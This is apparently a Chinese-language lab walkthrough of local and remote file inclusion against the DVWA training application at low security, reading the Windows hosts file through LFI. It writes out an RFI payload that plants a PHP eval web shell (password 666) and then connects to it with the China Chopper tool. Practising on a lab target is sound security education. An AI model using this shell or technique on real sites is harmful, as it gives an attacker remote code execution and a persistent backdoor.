实验环境:
环境搭建
1、将DVWA Security
級別换成low
2、打开php的配置文件,搜索allow_url_include
,把off换成on,然后重启
模拟实验
本地文件包含(LFI)
1、点击File Inclusion
中的file1.php
2、在图示位置输入C:\Windows\System32\drivers\etc\hosts
就可以看到hosts里的内容了
远程文件包含(RFI)
1、查看本机IP
2、在www目录下创建一个内容为<?php phpinfo();?>
的txt
文件
3、在浏览器中输入IP和创建的文件,内容只显示不执行
4、复制URL,粘贴到DVWA的page=
下,能够执行
5、将txt内容改为<?php $file = fopen("a.php","w");fputs($file,'<?php @eval($_REQUEST[666]);?>')?>
,然后刷新页面
6、在fi
后加入a.php?666=phpinfo();
可以正常显示
7、复制地址http://192.168.1.4/DVWA-master/vulnerabilities/fi/a.php
8、打开菜刀添加网址,输入666密码连接
9、点击添加的连接对象,成功进入